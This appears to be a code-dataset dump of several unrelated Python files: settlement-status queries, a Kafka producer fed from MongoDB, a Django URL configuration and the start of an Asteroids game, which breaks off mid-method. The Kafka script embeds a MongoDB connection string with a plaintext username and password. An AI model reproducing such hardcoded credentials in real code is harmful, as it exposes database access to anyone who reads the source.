and1.AddAttrNode('SplitParent', 'EQUAL', None)\n if autoNetTypes:\n if 'Coupon' in autoNetTypes:\n and1.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.COUPON))\n if 'Redemption' in autoNetTypes:\n and1.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.REDEMPTION))\n if 'Dividend' in autoNetTypes:\n and1.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.DIVIDEND))\n\n and1.AddAttrNode('ManualMatch', 'EQUAL', 0)\n and1.AddAttrNode('RestrictNet', 'EQUAL', 0)\n\n and2 = CONST_ApplicableForNettingQuery.AddOpNode('AND')\n and2.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n and2.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n or2 = and2.AddOpNode('OR')\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CLOSE_TRADE_NET))\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n\n return CONST_ApplicableForNettingQuery\n\n\ndef GetIsCancelledSettlementQuery():\n global CONST_IsCancelledSettlementQuery\n if CONST_IsCancelledSettlementQuery != None:\n return CONST_IsCancelledSettlementQuery\n\n CONST_IsCancelledSettlementQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_IsCancelledSettlementQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n\n or1 = CONST_IsCancelledSettlementQuery.AddOpNode('OR')\n or1.AddAttrNode('IsCancelledByTheCounterparty', 'EQUAL', True)\n or1.AddAttrNode('IsCancelledByUs', 'EQUAL', True)\n\n return CONST_IsCancelledSettlementQuery\n\n\ndef GetIsClosingPayoutTradeQuery():\n global CONST_IsClosingPayoutTradeQuery\n if CONST_IsClosingPayoutTradeQuery != None:\n return CONST_IsClosingPayoutTradeQuery\n\n CONST_IsClosingPayoutTradeQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_IsClosingPayoutTradeQuery.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('TradeType', TradeType.CLOSING))\n or1 = CONST_IsClosingPayoutTradeQuery.AddOpNode('OR')\n or1.AddAttrNode('Instrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.FUTURE_FORWARD))\n or1.AddAttrNode('Instrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.VARIANCE_SWAP))\n return CONST_IsClosingPayoutTradeQuery\n\ndef GetIsClosingTradeQuery():\n global CONST_IsClosingTradeQuery\n if CONST_IsClosingTradeQuery != None:\n return CONST_IsClosingTradeQuery\n CONST_IsClosingTradeQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_IsClosingTradeQuery.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('TradeType', TradeType.CLOSING))\n return CONST_IsClosingTradeQuery\n\ndef GetIsNDFTradeQuery():\n global CONST_IsNDFTradeQuery\n if CONST_IsNDFTradeQuery != None:\n return CONST_IsNDFTradeQuery\n CONST_IsNDFTradeQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_IsNDFTradeQuery.AddAttrNode('Instrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.FUTURE_FORWARD))\n CONST_IsNDFTradeQuery.AddAttrNode('Instrument.Underlying.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.CURR))\n CONST_IsNDFTradeQuery.AddAttrNode('Instrument.SettlementType', 'EQUAL', Utils.GetEnum('SettlementType', SettleType.CASH))\n return CONST_IsNDFTradeQuery\n\ndef IsAdHocNetQuery():\n global CONST_IsAdHocNetQuery\n if CONST_IsAdHocNetQuery != None:\n return CONST_IsAdHocNetQuery\n CONST_IsAdHocNetQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_IsAdHocNetQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.AD_HOC_NET))\n CONST_IsAdHocNetQuery.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NONE))\n\n return CONST_IsAdHocNetQuery\n\ndef IsPostReleasedSettlementOrPartOfNetHierarchy():\n global CONST_IsPostReleasedSettlementOrPartOfNetHierarchy\n if CONST_IsPostReleasedSettlementOrPartOfNetHierarchy != None:\n return CONST_IsPostReleasedSettlementOrPartOfNetHierarchy\n CONST_IsPostReleasedSettlementOrPartOfNetHierarchy = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_IsPostReleasedSettlementOrPartOfNetHierarchy.AddOpNode('AND')\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.ACKNOWLEDGED))\n and1.AddAttrNode('Parent', 'EQUAL', None)\n or1 = and1.AddOpNode('OR')\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_NOMINAL))\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.AGGREGATE_SECURITY))\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.END_SECURITY))\n or1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_DVP))\n\n and2 = CONST_IsPostReleasedSettlementOrPartOfNetHierarchy.AddOpNode('AND')\n and2.AddAttrNode('IsPartOfHierarchy', 'EQUAL', True)\n and2.AddAttrNode('Parent.Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.ACKNOWLEDGED))\n or2 = and2.AddOpNode('OR')\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_NOMINAL))\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.AGGREGATE_SECURITY))\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.END_SECURITY))\n or2.AddAttrNode('Parent.Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.SECURITY_DVP))\n or3 = and2.AddOpNode('OR')\n or3.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n or3.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n\n return CONST_IsPostReleasedSettlementOrPartOfNetHierarchy\n\ndef IsVoidCancelCorrectChild():\n #Retrieves child of settlement with relation type \"Cancel Correct\" or child of settlement\n #of relation type \"Securities DvP Net\" or \"Net\", which is in turn the child of a settlement\n #of relation type \"Cancel Correct\"\n global CONST_IsVoidCancelCorrectChild\n if CONST_IsVoidCancelCorrectChild != None:\n return CONST_IsVoidCancelCorrectChild\n CONST_IsVoidCancelCorrectChild = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n\n CONST_IsVoidCancelCorrectChild.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n\n or1 = CONST_IsVoidCancelCorrectChild.AddOpNode('OR')\n or1.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CANCEL_CORRECT))\n\n and1 = or1.AddOpNode('AND')\n and1.AddAttrNode('Parent.Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CANCEL_CORRECT))\n\n or2 = and1.AddOpNode('OR')\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n or2.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n\n return CONST_IsVoidCancelCorrectChild\n\ndef IsCancelledSettlement():\n global CONST_IsCancelledSettlement\n if CONST_IsCancelledSettlement != None:\n return CONST_IsCancelledSettlement\n CONST_IsCancelledSettlement = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_IsCancelledSettlement.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.CANCELLED))\n\n return CONST_IsCancelledSettlement\n\ndef IsSecuritySettlementWithStatusReplaced():\n global CONST_IsSecuritySettlementWithStatusReplaced\n if CONST_IsSecuritySettlementWithStatusReplaced != None:\n return CONST_IsSecuritySettlementWithStatusReplaced\n CONST_IsSecuritySettlementWithStatusReplaced = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n and1 = CONST_IsSecuritySettlementWithStatusReplaced.AddOpNode('AND')\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.REPLACED))\n and1.AddAttrNode('IsSecurity', 'EQUAL', 'True')\n\n and2 = CONST_IsSecuritySettlementWithStatusReplaced.AddOpNode('AND')\n and2.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n and2.AddAttrNode('Parent.Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.REPLACED))\n and2.AddAttrNode('Parent.IsSecurity', 'EQUAL', 'True')\n return CONST_IsSecuritySettlementWithStatusReplaced\n\ndef GetSettledSecuritySettlementQuery():\n global CONST_IsSettledSecuritySettlementQuery\n if CONST_IsSettledSecuritySettlementQuery != None:\n return CONST_IsSettledSecuritySettlementQuery\n CONST_IsSettledSecuritySettlementQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n and1 = CONST_IsSettledSecuritySettlementQuery.AddOpNode('AND')\n and1.AddAttrNode('IsSettled', 'EQUAL', True)\n and1.AddAttrNode('IsSecurity', 'EQUAL', True)\n and2 = CONST_IsSettledSecuritySettlementQuery.AddOpNode('AND')\n and2.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n and2.AddAttrNode('Parent.IsSettled', 'EQUAL', True)\n and2.AddAttrNode('Parent.IsSecurity', 'EQUAL', True)\n return CONST_IsSettledSecuritySettlementQuery\n\ndef GetValueDayAdjustedQuery():\n global CONST_ValueDayAdjustedQuery\n if CONST_ValueDayAdjustedQuery != None:\n return CONST_ValueDayAdjustedQuery\n CONST_ValueDayAdjustedQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_ValueDayAdjustedQuery.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n CONST_ValueDayAdjustedQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.VALUE_DAY_ADJUSTED))\n return CONST_ValueDayAdjustedQuery\n","sub_path":"Extensions/Default/FPythonCode/FSettlementStatusQueries.py","file_name":"FSettlementStatusQueries.py","file_ext":"py","file_size_in_byte":29759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"148904100","text":"from confluent_kafka import Producer\nimport sys\n# import time\n# import pymongo\n# from bson.codec_options import CodecOptions\n# import pytz\n\n\ndef go_kafka_rt():\n import pymongo\n from bson.codec_options import CodecOptions\n import pytz\n import time\n\n client = pymongo.MongoClient(\"mongodb+srv://eks210017:eks210017@cluster0.yrvuu.mongodb.net/mydatabase?retryWrites=true&w=majority\")\n options = CodecOptions(tz_aware=True, tzinfo=pytz.timezone('Asia/Taipei'))\n db = client.get_default_database(codec_options=options)\n\n # items_green_tea = db.items.find_one({'item_name': 'GreenTea'}, {'_id': 0})\n # t_time_gt = items_green_tea['date'].strftime('%Y-%m-%d %H:%M:%S')\n # taiwan_time_gt = db.items.update_one({'item_name': \"GreenTea\"}, {'$set': {'taiwan_time': t_time_gt}})\n\n items_red_tea = db.items.find_one({'item_name': 'RedTea'}, {'_id': 0})\n t_time_rt = items_red_tea['date'].strftime('%Y-%m-%d %H:%M:%S')\n taiwan_time_rt = db.items.update_one({'item_name': \"RedTea\"}, {'$set': {'taiwan_time': t_time_rt}})\n\n # items_milk_tea = db.items.find_one({'item_name': 'MilkTea'}, {'_id': 0})\n # t_time_mt = items_milk_tea['date'].strftime('%Y-%m-%d %H:%M:%S')\n # taiwan_time_mt = db.items.update_one({'item_name': \"MilkTea\"}, {'$set': {'taiwan_time': t_time_mt}})\n\n # print(items_coke['item_name'], items_coke['user_take'], items_coke['price'])\n # print(items_tea['item_name'], items_tea['user_take'], items_tea['price'])\n\n # 用來接收從Consumer instance發出的error訊息\n def error_cb(err):\n print('Error: %s' % err)\n\n\n props = {\n # Kafka集群在那裡? 10.1.0.87:9092\n 'bootstrap.servers': '10.1.0.87:9092', # <-- 置換成要連接的Kafka集群\n 'error_cb': error_cb # 設定接收error訊息的callback函數\n }\n # 步驟2. 產生一個Kafka的Producer的實例\n producer = Producer(props)\n # 步驟3. 指定想要發佈訊息的topic名稱\n # topicName_1 = 'items'\n topicName_2 = 'items2'\n # topicName_3 = 'items3'\n msgCounter = 0\n try:\n # produce(topic, [value], [key], [partition], [on_delivery], [timestamp], [headers])\n # producer.produce(topicName_1, '{} 數量: {} 價格: {} date: {}'.format(items_green_tea['item_name'], items_green_tea['user_take'], items_green_tea['price'], items_green_tea['taiwan_time']), '商品')\n producer.produce(topicName_2, '紅茶 數量: {} 價格: {} '.format(items_red_tea['user_take'], items_red_tea['price']), '商品2')\n # producer.produce(topicName_3, '{} 數量: {} 價格: {} date: {}'.format(items_milk_tea['item_name'], items_milk_tea['user_take'], items_milk_tea['price'], items_milk_tea['taiwan_time']), '商品')\n producer.flush()\n # msgCounter += 2\n print('Send ' + ' messages to Kafka')\n except BufferError as e:\n # 錯誤處理\n sys.stderr.write('%% Local producer queue is full ({} messages awaiting delivery): try again\\n'\n .format(len(producer)))\n except Exception as e:\n print(e)\n # 步驟5. 確認所在Buffer的訊息都己經送出去給Kafka了\n producer.flush()\n","sub_path":"Flask/kafka_producer_mt.py","file_name":"kafka_producer_mt.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503726280","text":"from django.contrib.auth.decorators import login_required\r\nfrom django.conf import settings\r\nfrom django.conf.urls import url, include, i18n\r\nfrom . import views, views_md, views_hlq, views_cra, views_ass\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [ \r\n \r\n # index\r\n url(r'^$', \r\n views.index, \r\n name='index'), \r\n \r\n # Authentication\r\n #url('^', include('django.contrib.auth.urls')), \r\n url(r'^login/$', \r\n views.user_login, \r\n name='login'),\r\n \r\n url(r'^logout/$', \r\n views.user_logout, \r\n name='logout'),\r\n \r\n # HighLevelQuestionnaire \r\n \r\n url(r'^hlq/$',\r\n views_hlq.hlq_list,\r\n name='hlq_list'),\r\n \r\n url(r'^hlq/create/$',\r\n views_hlq.hlq_create,\r\n name='hlq_create'),\r\n \r\n url(r'^hlq/(?P[0-9]+)/update/$',\r\n views_hlq.hlq_update,\r\n name='hlq_update'),\r\n \r\n url(r'^hlq/(?P[0-9]+)/delete/$',\r\n views_hlq.hlq_delete,\r\n name='hlq_delete'),\r\n \r\n url(r'^hlq/(?P[0-9]+)/$',\r\n views_hlq.hlq_app_list,\r\n name='hlq_app_list'),\r\n \r\n # HighLevelQuestionnaire-Application \r\n \r\n url(r'^hlq/(?P[0-9]+)/create',\r\n views_hlq.hlq_app_create,\r\n name='hlq_app_create'),\r\n \r\n url(r'^hlq_app/(?P[0-9]+)/update/$',\r\n views_hlq.hlq_app_update,\r\n name='hlq_app_update'),\r\n \r\n url(r'^hlq_app/(?P[0-9]+)/delete/$',\r\n views_hlq.hlq_app_delete,\r\n name='hlq_app_delete'),\r\n \r\n \r\n # CloudReadinessAssessment \r\n \r\n url(r'^cra/$',\r\n views_cra.cra_list,\r\n name='cra_list'),\r\n \r\n url(r'^cra/create/$',\r\n views_cra.cra_create,\r\n name='cra_create'),\r\n \r\n url(r'^cra/(?P[0-9]+)/update/$',\r\n views_cra.cra_update,\r\n name='cra_update'),\r\n \r\n url(r'^cra/(?P[0-9]+)/delete/$',\r\n views_cra.cra_delete,\r\n name='cra_delete'),\r\n \r\n url(r'^cra/(?P[0-9]+)/$',\r\n views_cra.cra_app_list,\r\n name='cra_app_list'),\r\n \r\n # CloudReadinessAssessment-Application \r\n \r\n url(r'^cra/(?P[0-9]+)/create',\r\n views_cra.cra_app_create,\r\n name='cra_app_create'),\r\n \r\n url(r'^cra_app/(?P[0-9]+)/update/$',\r\n views_cra.cra_app_update,\r\n name='cra_app_update'),\r\n \r\n url(r'^cra_app/(?P[0-9]+)/delete/$',\r\n views_cra.cra_app_delete,\r\n name='cra_app_delete'),\r\n \r\n # Assessment \r\n \r\n url(r'^ass/$',\r\n views_ass.ass_list,\r\n name='ass_list'),\r\n\r\n url(r'^ass/create/$',\r\n views_ass.ass_create,\r\n name='ass_create'),\r\n \r\n url(r'^ass/(?P[0-9]+)/update/$',\r\n views_ass.ass_update,\r\n name='ass_update'),\r\n \r\n url(r'^ass/(?P[0-9]+)/delete/$',\r\n views_ass.ass_delete,\r\n name='ass_delete'),\r\n \r\n url(r'^ass/(?P[0-9]+)/export/$',\r\n views_ass.ass_export,\r\n name='ass_export'),\r\n \r\n # Assessment-Application \r\n \r\n url(r'^ass/(?P[0-9]+)/$',\r\n views_ass.ass_app_list,\r\n name='ass_app_list'),\r\n \r\n url(r'^ass/(?P[0-9]+)/create',\r\n views_ass.ass_app_create,\r\n name='ass_app_create'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/update/$',\r\n views_ass.ass_app_update,\r\n name='ass_app_update'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_delete,\r\n name='ass_app_delete'),\r\n \r\n # Assessment-Application-Documents \r\n \r\n url(r'^ass_app/(?P[0-9]+)/doc/$',\r\n views_ass.ass_app_doc_form,\r\n name='ass_app_doc_form'),\r\n \r\n # Assessment-Application-Server \r\n \r\n url(r'^ass_app/(?P[0-9]+)/srv_list/$',\r\n views_ass.ass_app_srv_list,\r\n name='ass_app_srv_list'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/srv_create',\r\n views_ass.ass_app_srv_create,\r\n name='ass_app_srv_create'),\r\n\r\n url(r'^ass_app/(?P[0-9]+)/srv_saveas',\r\n views_ass.ass_app_srv_saveas,\r\n name='ass_app_srv_saveas'),\r\n\r\n url(r'^ass_app_srv/(?P[0-9]+)/update/$',\r\n views_ass.ass_app_srv_update,\r\n name='ass_app_srv_update'),\r\n \r\n url(r'^ass_app_srv/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_srv_delete,\r\n name='ass_app_srv_delete'),\r\n \r\n # Assessment-Application-Interface\r\n \r\n url(r'^ass_app/(?P[0-9]+)/int_list/$',\r\n views_ass.ass_app_int_list,\r\n name='ass_app_int_list'),\r\n \r\n url(r'^ass_app/(?P[0-9]+)/int_create',\r\n views_ass.ass_app_int_create,\r\n name='ass_app_int_create'),\r\n \r\n url(r'^ass_app_int/(?P[0-9]+)/update/$',\r\n views_ass.ass_app_int_update,\r\n name='ass_app_int_update'),\r\n \r\n url(r'^ass_app_int/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_int_delete,\r\n name='ass_app_int_delete'),\r\n \r\n url(r'^ass_app_int/(?P[0-9]+)/delete/$',\r\n views_ass.ass_app_int_delete,\r\n name='ass_app_int_delete'),\r\n \r\n # Master data - Location \r\n \r\n url(r'^location/(?P[0-9]+)/delete/$',\r\n login_required(views_md.LocationDelete.as_view()),\r\n name='location_delete'),\r\n \r\n url(r'^location/(?P[0-9]+)/update/$',\r\n login_required(views_md.LocationUpdate.as_view()),\r\n name='location_update'),\r\n \r\n url(r'^location/create/$',\r\n login_required(views_md.LocationCreate.as_view()),\r\n name='location_create'),\r\n \r\n url(r'^location/$',\r\n login_required(views_md.LocationList.as_view()),\r\n name='location_list'),\r\n\r\n url(r'^add/location/?$',\r\n views_ass.location_addrelated),\r\n\r\n # Master data - AppCategory\r\n \r\n url(r'^appcategory/(?P[0-9]+)/delete/$',\r\n views_md.AppCategoryDelete.as_view(),\r\n name='appcategory_delete'),\r\n \r\n url(r'^appcategory/(?P[0-9]+)/update/$',\r\n views_md.AppCategoryUpdate.as_view(),\r\n name='appcategory_update'),\r\n \r\n url(r'^appcategory/create/$',\r\n views_md.AppCategoryCreate.as_view(),\r\n name='appcategory_create'),\r\n \r\n url(r'^appcategory/$',\r\n views_md.AppCategoryList.as_view(),\r\n name='appcategory_list'),\r\n\r\n url(r'^add/app_category/?$',\r\n views_ass.app_category_addrelated),\r\n \r\n # Master data - AppVendor\r\n \r\n url(r'^appvendor/(?P[0-9]+)/delete/$',\r\n views_md.AppVendorDelete.as_view(),\r\n name='appvendor_delete'),\r\n \r\n url(r'^appvendor/(?P[0-9]+)/update/$',\r\n views_md.AppVendorUpdate.as_view(),\r\n name='appvendor_update'),\r\n \r\n url(r'^appvendor/create/$',\r\n views_md.AppVendorCreate.as_view(),\r\n name='appvendor_create'),\r\n \r\n url(r'^appvendor/$',\r\n views_md.AppVendorList.as_view(),\r\n name='appvendor_list'),\r\n\r\n url(r'^add/app_vendor/?$',\r\n views_ass.app_vendor_addrelated),\r\n \r\n # Master data - Authentication type \r\n \r\n url(r'^authenticationtype/(?P[0-9]+)/delete/$',\r\n views_md.AuthenticationTypeDelete.as_view(),\r\n name='authenticationtype_delete'),\r\n \r\n url(r'^authenticationtype/(?P[0-9]+)/update/$',\r\n views_md.AuthenticationTypeUpdate.as_view(),\r\n name='authenticationtype_update'),\r\n \r\n url(r'^authenticationtype/create/$',\r\n views_md.AuthenticationTypeCreate.as_view(),\r\n name='authenticationtype_create'),\r\n \r\n url(r'^authenticationtype/$',\r\n views_md.AuthenticationTypeList.as_view(),\r\n name='authenticationtype_list'),\r\n\r\n url(r'^add/authentication_type/?$',\r\n views_ass.authentication_type_addrelated),\r\n \r\n # Master data - Database system \r\n \r\n url(r'^databasesystem/(?P[0-9]+)/delete/$',\r\n views_md.DatabaseSystemDelete.as_view(),\r\n name='databasesystem_delete'),\r\n \r\n url(r'^databasesystem/(?P[0-9]+)/update/$',\r\n views_md.DatabaseSystemUpdate.as_view(),\r\n name='databasesystem_update'),\r\n \r\n url(r'^databasesystem/create/$',\r\n views_md.DatabaseSystemCreate.as_view(),\r\n name='databasesystem_create'),\r\n \r\n url(r'^databasesystem/$',\r\n views_md.DatabaseSystemList.as_view(),\r\n name='databasesystem_list'),\r\n\r\n url(r'^add/database_system/?$',\r\n views_ass.database_system_addrelated),\r\n \r\n # Master data - Interface type \r\n \r\n url(r'^interfacetype/(?P[0-9]+)/delete/$',\r\n views_md.InterfaceTypeDelete.as_view(),\r\n name='interfacetype_delete'),\r\n \r\n url(r'^interfacetype/(?P[0-9]+)/update/$',\r\n views_md.InterfaceTypeUpdate.as_view(),\r\n name='interfacetype_update'),\r\n \r\n url(r'^interfacetype/create/$',\r\n views_md.InterfaceTypeCreate.as_view(),\r\n name='interfacetype_create'),\r\n \r\n url(r'^interfacetype/$',\r\n views_md.InterfaceTypeList.as_view(),\r\n name='interfacetype_list'),\r\n \r\n url(r'^add/interface_type/?$',\r\n views_ass.interfacetype_addrelated,\r\n name='ass_app_interfacetype_addrelated'),\r\n \r\n # Master data - Operating system \r\n \r\n url(r'^operatingsystem/(?P[0-9]+)/delete/$',\r\n views_md.OperatingSystemDelete.as_view(),\r\n name='operatingsystem_delete'),\r\n \r\n url(r'^operatingsystem/(?P[0-9]+)/update/$',\r\n views_md.OperatingSystemUpdate.as_view(),\r\n name='operatingsystem_update'),\r\n \r\n url(r'^operatingsystem/create/$',\r\n views_md.OperatingSystemCreate.as_view(),\r\n name='operatingsystem_create'),\r\n \r\n url(r'^operatingsystem/$',\r\n views_md.OperatingSystemList.as_view(),\r\n name='operatingsystem_list'),\r\n\r\n url(r'^add/operating_system/?$',\r\n views_ass.operating_system_addrelated),\r\n\r\n # Master data - contact\r\n \r\n url(r'^contact/(?P[0-9]+)/delete/$',\r\n views_md.ContactDelete.as_view(),\r\n name='contact_delete'),\r\n \r\n url(r'^contact/(?P[0-9]+)/update/$',\r\n views_md.ContactUpdate.as_view(),\r\n name='contact_update'),\r\n \r\n url(r'^contact/create/$',\r\n views_md.ContactCreate.as_view(),\r\n name='contact_create'),\r\n \r\n url(r'^contact/$',\r\n views_md.ContactList.as_view(),\r\n name='contact_list'),\r\n \r\n url(r'^add/app_manager/?$',\r\n views_ass.app_manager_addrelated),\r\n\r\n url(r'^add/business_expert/?$',\r\n views_ass.business_expert_addrelated),\r\n\r\n url(r'^add/app_architect/?$',\r\n views_ass.app_architect_addrelated),\r\n\r\n url(r'^add/it_coordinator/?$',\r\n views_ass.it_coordinator_addrelated),\r\n\r\n url(r'^add/migration_manager/?$',\r\n views_ass.migration_manager_addrelated),\r\n\r\n url(r'^add/migration_lead/?$',\r\n views_ass.migration_lead_addrelated),\r\n\r\n url(r'^add/migration_coordinator/?$',\r\n views_ass.migration_coordinator_addrelated),\r\n\r\n url(r'^add/technical_expert/?$',\r\n views_ass.technical_expert_addrelated),\r\n\r\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n","sub_path":"app_ac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":11292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509904944","text":"from screen import Screen\nimport sys\n\n# my imports\nfrom random import randint\nfrom math import cos, sin, radians\nfrom ship import *\nfrom asteroid import *\nfrom torepdo import *\n\nDEFAULT_ASTEROIDS_NUM = 5\n\n# my assignments\nASTEROIDS_SIZE = 3\nTORPEDO_RADIUS = 4\nTORPEDO_LIFE_TIME = 200\nRETRIES_AMOUNT = 3\nDEFAULT_SHIP_HEADING = 0.0\nHIT_ASTEROID_TITLE = \"You got hit!\"\nHIT_ASTEROID = \"You got hit by an asteroid bruh, careful!\"\nLOSE_TITLE = \"You lost BRUHHHHHHHHH!\"\nLOSE_MSG = \"You lost. Next time :) (bruh)\"\nWON_TITLE = \"You won!\"\nWON_MSG = \"BRUHHH you won whoooo!\"\n\n\nclass GameRunner:\n\n def __init__(self, asteroids_amount):\n self.__screen = Screen()\n\n self.__screen_max_x = Screen.SCREEN_MAX_X\n self.__screen_max_y = Screen.SCREEN_MAX_Y\n self.__screen_min_x = Screen.SCREEN_MIN_X\n self.__screen_min_y = Screen.SCREEN_MIN_Y\n\n # my assignments\n print(\"Starting...\")\n self.__asteroids_amount = asteroids_amount\n self.__asteroids_objects = []\n self.__torpedo_objects = []\n self.__is_start = True\n self.__avg_x = self.__screen_max_x - self.__screen_min_x\n self.__avg_y = self.__screen_max_y - self.__screen_min_y\n self.__ship_angle = 0\n self.__ship = Ship(x=0, y=0, speed_x=0, speed_y=0, angle=0, radius=1)\n self.__lives = 3\n self.__is_torpedo_launched = False\n self.__score = RETRIES_AMOUNT\n self.spawn_asteroids()\n\n # ----GENERAL METHODS----\n\n def run(self):\n self._do_loop()\n self.__screen.start_screen()\n\n def _do_loop(self):\n # You should not to change this method!\n self._game_loop()\n # Set the timer to go off again\n self.__screen.update()\n self.__screen.ontimer(self._do_loop, 5)\n\n def check_if_keys_pressed(self):\n \"\"\"\n this method will check if any of the specific keys have been pressed\n :return:\n \"\"\"\n\n self.check_win()\n if self.__screen.is_up_pressed() == 1:\n self.speed_up()\n elif self.__screen.is_right_pressed() == 1:\n self.change_angle(True, False)\n elif self.__screen.is_left_pressed() == 1:\n self.change_angle(False, True)\n elif self.__screen.is_space_pressed() == 1:\n self.spawn_torpedo()\n elif self.__screen.should_end():\n print(\"[!] Player exited\")\n self.__screen.end_game()\n sys.exit(0)\n\n def check_win(self):\n \"\"\"\n this method will check if the player has won\n :return: false if he didn't win\n \"\"\"\n\n if len(self.__asteroids_objects) == 0:\n self.__screen.show_message(WON_TITLE, WON_MSG)\n self.__screen.end_game()\n print(\"Player won\")\n sys.exit(0)\n elif self.__lives == 0:\n self.__screen.show_message(LOSE_TITLE, LOSE_MSG)\n self.__screen.end_game()\n print(\"Player lost\")\n sys.exit(0)\n return False\n\n def set_score(self, asteroid_obj):\n \"\"\"\n this method will update the score according to the asteroid size\n :param asteroid_obj: according to size of asteroid obj\n :return:\n \"\"\"\n\n if asteroid_obj.return_size() == 3:\n self.__score += 20\n elif asteroid_obj.return_size() == 2:\n self.__score += 50\n else: # asteroid with 1 size\n self.__score += 100\n self.__screen.set_score(self.__score) # updating\n\n def _game_loop(self):\n self.check_win()\n self.spawn_ship()\n self.move_asteroids()\n self.check_if_keys_pressed()\n self.move_ship()\n if len(self.__torpedo_objects) > 0: # to check the torpedoes status and move him\n for torpedo in self.__torpedo_objects:\n torpedo.add_to_life_time()\n self.check_torpedo_time(torpedo)\n self.move_torpedo()\n\n # ----SHIP METHODS----\n\n def change_angle(self, right_bool, left_bool):\n \"\"\"\n this method will change the angle of the ship,\n according to the player keystrokes\n :param right_bool: true if he wanted to move right\n :type right_bool: bool\n :param left_bool: true if he wanted to move left\n :type left_bool: bool\n :return: angle of ship\n \"\"\"\n\n if right_bool:\n self.__ship_angle -= 7\n elif left_bool:\n self.__ship_angle += 7\n return self.__ship_angle\n\n def spawn_ship(self):\n \"\"\"\n this method will spawn the ship, and check if-\n the ship already was spawned to prevent spawning infinitely\n :return:\n \"\"\"\n 